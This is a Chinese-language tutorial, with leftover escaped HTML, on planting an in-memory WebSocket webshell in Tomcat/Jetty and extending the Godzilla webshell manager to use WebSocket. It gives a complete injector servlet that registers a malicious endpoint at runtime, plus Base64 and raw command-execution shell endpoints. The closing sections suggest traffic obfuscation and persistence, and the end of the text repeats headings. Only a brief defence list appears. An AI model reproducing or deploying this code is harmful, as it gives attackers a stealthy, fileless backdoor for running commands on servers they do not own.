WebSocket内存马及GodZilla二开技术详解<\/h1>

1. WebSocket技术基础<\/h2>

1.1 WebSocket概述<\/h3>

基于TCP协议的全双工通信协议<\/li>
相比HTTP的单向请求-响应模式，允许客户端和服务器同时发送和接收数据<\/li>

握手阶段仍使用HTTP协议，升级后使用WebSocket协议通信<\/li> <\/ul>

1.2 内存马注入条件<\/h3>

目标中间件需支持JSR356规范<\/li>

适用中间件版本：

Tomcat 7.0.47+<\/li>

Jetty 9.4+<\/li> <\/ul> <\/li> <\/ul>

2. WebSocket内存马实现方式<\/h2>

2.1 通过@ServerEndpoint注解实现<\/h3>

@ServerEndpoint<\/span>(<\/span>"\/ws"<\/span>)<\/span>
<\/span><\/span>public<\/span> class<\/span> WebSocketDemo<\/span> {<\/span>
<\/span><\/span>    @OnOpen<\/span>
<\/span><\/span>    public<\/span> void<\/span> onOpen<\/span>(<\/span>Session session)<\/span> {<\/span>
<\/span><\/span>        \/\/ 初始化会话资源
<\/span><\/span><\/span><\/span>    }<\/span>
<\/span><\/span>    
<\/span><\/span>    @OnMessage<\/span>
<\/span><\/span>    public<\/span> void<\/span> onMessage<\/span>(<\/span>String message,<\/span> Session session)<\/span> {<\/span>
<\/span><\/span>        \/\/ 处理客户端消息
<\/span><\/span><\/span><\/span>    }<\/span>
<\/span><\/span>    
<\/span><\/span>    @OnError<\/span>
<\/span><\/span>    public<\/span> void<\/span> onError<\/span>(<\/span>Throwable error)<\/span> {<\/span>
<\/span><\/span>        \/\/ 错误处理
<\/span><\/span><\/span><\/span>    }<\/span>
<\/span><\/span>    
<\/span><\/span>    @OnClose<\/span>
<\/span><\/span>    public<\/span> void<\/span> onClose<\/span>(<\/span>Session session)<\/span> {<\/span>
<\/span><\/span>        \/\/ 资源释放
<\/span><\/span><\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>2.2 通过继承javax.websocket.Endpoint类实现<\/h3>
public<\/span> class<\/span> WebSocketEndpoint<\/span> extends<\/span> Endpoint implements<\/span> MessageHandler.<\/span>Whole<\/span><<\/span>String><\/span> {<\/span>
<\/span><\/span>    @Override<\/span>
<\/span><\/span>    public<\/span> void<\/span> onOpen<\/span>(<\/span>Session session,<\/span> EndpointConfig config)<\/span> {<\/span>
<\/span><\/span>        session.<\/span>addMessageHandler<\/span>(<\/span>this<\/span>);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    
<\/span><\/span>    @Override<\/span>
<\/span><\/span>    public<\/span> void<\/span> onMessage<\/span>(<\/span>String message)<\/span> {<\/span>
<\/span><\/span>        \/\/ 消息处理逻辑
<\/span><\/span><\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>3. WebSocket初始化流程<\/h2>
3.1 Tomcat启动流程<\/h3>

standardContext.startInternal<\/code>方法初始化Web应用<\/li>
触发ServletContainerInitializers<\/code>初始化<\/li>
调用ServletContainerInitializer.onStartup()<\/code>方法<\/li>
<\/ol>
3.2 WebSocket特定流程<\/h3>

Tomcat jar包中包含META-INF\/services\/javax.servlet.ServletContainerInitializer<\/code><\/li>
内容指向org.apache.tomcat.websocket.server.WsSci<\/code><\/li>
容器通过SPI加载WsSci<\/code>并调用其onStartup<\/code>方法<\/li>
初始化WebSocket容器并筛选WebSocket组件<\/li>
<\/ol>
4. WebSocket连接流程<\/h2>

HTTP请求 → WsFilter判断是否为WebSocket请求<\/li>
发起升级协议(HTTP → WebSocket)<\/li>
建立WebSocket连接<\/li>
<\/ol>
关键判断条件：<\/p>

this.sc.areEndpointsRegistered()<\/code>：检查WebSocket容器是否有服务端点注册<\/li>
isWebSocketUpgradeRequest()<\/code>：检查是否为WebSocket升级请求<\/li>
<\/ul>
5. 内存马注入技术实现<\/h2>
5.1 构造ServerEndpointConfig实例<\/h3>
ServerEndpointConfig config =<\/span> ServerEndpointConfig.<\/span>Builder<\/span>.<\/span>create<\/span>(<\/span>
<\/span><\/span>    WebSocketShell.<\/span>class<\/span>,<\/span> \/\/ 恶意Endpoint类
<\/span><\/span><\/span><\/span>    "\/ws"<\/span> \/\/ 访问路径
<\/span><\/span><\/span><\/span>).<\/span>build<\/span>();<\/span>
<\/span><\/span><\/code><\/pre>5.2 获取WsServerContainer<\/h3>
\/\/ Tomcat 10以下版本
<\/span><\/span><\/span><\/span>WsServerContainer container =<\/span> (<\/span>WsServerContainer)<\/span> request.<\/span>getServletContext<\/span>()<\/span>
<\/span><\/span>    .<\/span>getAttribute<\/span>(<\/span>"javax.websocket.server.ServerContainer"<\/span>);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ Tomcat 10+版本
<\/span><\/span><\/span><\/span>WsServerContainer container =<\/span> (<\/span>WsServerContainer)<\/span> request.<\/span>getServletContext<\/span>()<\/span>
<\/span><\/span>    .<\/span>getAttribute<\/span>(<\/span>"jakarta.websocket.server.ServerContainer"<\/span>);<\/span>
<\/span><\/span><\/code><\/pre>5.3 完整注入代码<\/h3>
public<\/span> class<\/span> WebSocketInjector<\/span> extends<\/span> HttpServlet {<\/span>
<\/span><\/span>    protected<\/span> void<\/span> doGet<\/span>(<\/span>HttpServletRequest req,<\/span> HttpServletResponse resp)<\/span> {<\/span>
<\/span><\/span>        try<\/span> {<\/span>
<\/span><\/span>            \/\/ 获取WebSocket容器
<\/span><\/span><\/span><\/span>            WsServerContainer container =<\/span> (<\/span>WsServerContainer)<\/span> req.<\/span>getServletContext<\/span>()<\/span>
<\/span><\/span>                .<\/span>getAttribute<\/span>(<\/span>"javax.websocket.server.ServerContainer"<\/span>);<\/span>
<\/span><\/span>            
<\/span><\/span>            \/\/ 构造恶意Endpoint配置
<\/span><\/span><\/span><\/span>            ServerEndpointConfig config =<\/span> ServerEndpointConfig.<\/span>Builder<\/span>.<\/span>create<\/span>(<\/span>
<\/span><\/span>                WebSocketShell.<\/span>class<\/span>,<\/span>
<\/span><\/span>                "\/ws"<\/span>
<\/span><\/span>            ).<\/span>build<\/span>();<\/span>
<\/span><\/span>            
<\/span><\/span>            \/\/ 注册恶意Endpoint
<\/span><\/span><\/span><\/span>            container.<\/span>addEndpoint<\/span>(<\/span>config);<\/span>
<\/span><\/span>            
<\/span><\/span>            resp.<\/span>getWriter<\/span>().<\/span>println<\/span>(<\/span>"WebSocket内存马注入成功"<\/span>);<\/span>
<\/span><\/span>        }<\/span> catch<\/span> (<\/span>Exception e)<\/span> {<\/span>
<\/span><\/span>            e.<\/span>printStackTrace<\/span>();<\/span>
<\/span><\/span>        }<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>6. GodZilla二开实现WebSocket支持<\/h2>
6.1 哥斯拉基本逻辑<\/h3>

发送一个大马到服务器<\/li>
服务器加载大马到内存<\/li>
使用自定义通信方式与大马交互<\/li>
<\/ul>
6.2 WebSocket通信类实现<\/h3>
public<\/span> class<\/span> WebSocketCommunicator<\/span> {<\/span>
<\/span><\/span>    \/\/ 握手过程
<\/span><\/span><\/span><\/span>    public<\/span> void<\/span> handshake<\/span>()<\/span> {<\/span>
<\/span><\/span>        \/\/ 实现握手逻辑
<\/span><\/span><\/span><\/span>    }<\/span>
<\/span><\/span>    
<\/span><\/span>    \/\/ 发送大马
<\/span><\/span><\/span><\/span>    public<\/span> void<\/span> sendPayload<\/span>(<\/span>String payload)<\/span> {<\/span>
<\/span><\/span>        \/\/ 使用WebSocket发送大马
<\/span><\/span><\/span><\/span>    }<\/span>
<\/span><\/span>    
<\/span><\/span>    \/\/ 接收命令执行结果
<\/span><\/span><\/span><\/span>    public<\/span> String receiveResult<\/span>()<\/span> {<\/span>
<\/span><\/span>        \/\/ 接收并处理结果
<\/span><\/span><\/span><\/span>        return<\/span> result;<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>6.3 小马实现示例<\/h3>
Base64类型<\/h4>
@ServerEndpoint<\/span>(<\/span>"\/ws"<\/span>)<\/span>
<\/span><\/span>public<\/span> class<\/span> WebSocketShell<\/span> {<\/span>
<\/span><\/span>    @OnMessage<\/span>
<\/span><\/span>    public<\/span> void<\/span> onMessage<\/span>(<\/span>String message,<\/span> Session session)<\/span> {<\/span>
<\/span><\/span>        try<\/span> {<\/span>
<\/span><\/span>            String cmd =<\/span> new<\/span> String(<\/span>Base64.<\/span>getDecoder<\/span>().<\/span>decode<\/span>(<\/span>message));<\/span>
<\/span><\/span>            String result =<\/span> executeCmd(<\/span>cmd);<\/span>
<\/span><\/span>            session.<\/span>getBasicRemote<\/span>().<\/span>sendText<\/span>(<\/span>Base64.<\/span>getEncoder<\/span>().<\/span>encodeToString<\/span>(<\/span>result.<\/span>getBytes<\/span>()));<\/span>
<\/span><\/span>        }<\/span> catch<\/span> (<\/span>Exception e)<\/span> {<\/span>
<\/span><\/span>            e.<\/span>printStackTrace<\/span>();<\/span>
<\/span><\/span>        }<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    
<\/span><\/span>    private<\/span> String executeCmd<\/span>(<\/span>String cmd)<\/span> {<\/span>
<\/span><\/span>        \/\/ 命令执行逻辑
<\/span><\/span><\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>Raw类型<\/h4>
@ServerEndpoint<\/span>(<\/span>"\/ws"<\/span>)<\/span>
<\/span><\/span>public<\/span> class<\/span> WebSocketShell<\/span> {<\/span>
<\/span><\/span>    @OnMessage<\/span>
<\/span><\/span>    public<\/span> void<\/span> onMessage<\/span>(<\/span>String message,<\/span> Session session)<\/span> {<\/span>
<\/span><\/span>        try<\/span> {<\/span>
<\/span><\/span>            String result =<\/span> executeCmd(<\/span>message);<\/span>
<\/span><\/span>            session.<\/span>getBasicRemote<\/span>().<\/span>sendText<\/span>(<\/span>result);<\/span>
<\/span><\/span>        }<\/span> catch<\/span> (<\/span>Exception e)<\/span> {<\/span>
<\/span><\/span>            e.<\/span>printStackTrace<\/span>();<\/span>
<\/span><\/span>        }<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    
<\/span><\/span>    private<\/span> String executeCmd<\/span>(<\/span>String cmd)<\/span> {<\/span>
<\/span><\/span>        \/\/ 命令执行逻辑
<\/span><\/span><\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>7. 测试与注意事项<\/h2>

注入后访问\/ws<\/code>路径建立WebSocket连接<\/li>
发送命令并接收执行结果<\/li>
可能存在的延迟问题：

确保获取完整基础信息<\/li>
避免部分数据读取导致解析失败<\/li>
<\/ul>
<\/li>
<\/ol>
8. 防御措施<\/h2>

监控WebSocket端点动态注册<\/li>
检查WsServerContainer<\/code>的addEndpoint<\/code>调用<\/li>
限制WebSocket端点的访问权限<\/li>
定期检查内存中的WebSocket端点<\/li>
<\/ol>
9. 扩展思考<\/h2>

结合其他内存马技术实现复合型攻击<\/li>
针对不同中间件的适配实现<\/li>
流量加密与混淆技术<\/li>
持久化机制设计<\/li>
<\/ol>

WebSocket内存马及GodZilla二开技术详解<\/h1>

1. WebSocket技术基础<\/h2>

2. WebSocket内存马实现方式<\/h2>

3. WebSocket初始化流程<\/h2>

5. 内存马注入技术实现<\/h2>

6. GodZilla二开实现WebSocket支持<\/h2>

6.3 小马实现示例<\/h3>

9. 扩展思考<\/h2> 结合其他内存马技术实现复合型攻击<\/li> 针对不同中间件的适配实现<\/li> 流量加密与混淆技术<\/li> 持久化机制设计<\/li> <\/ol>

9. 扩展思考<\/h2>

结合其他内存马技术实现复合型攻击<\/li>
针对不同中间件的适配实现<\/li>
流量加密与混淆技术<\/li>
持久化机制设计<\/li> <\/ol>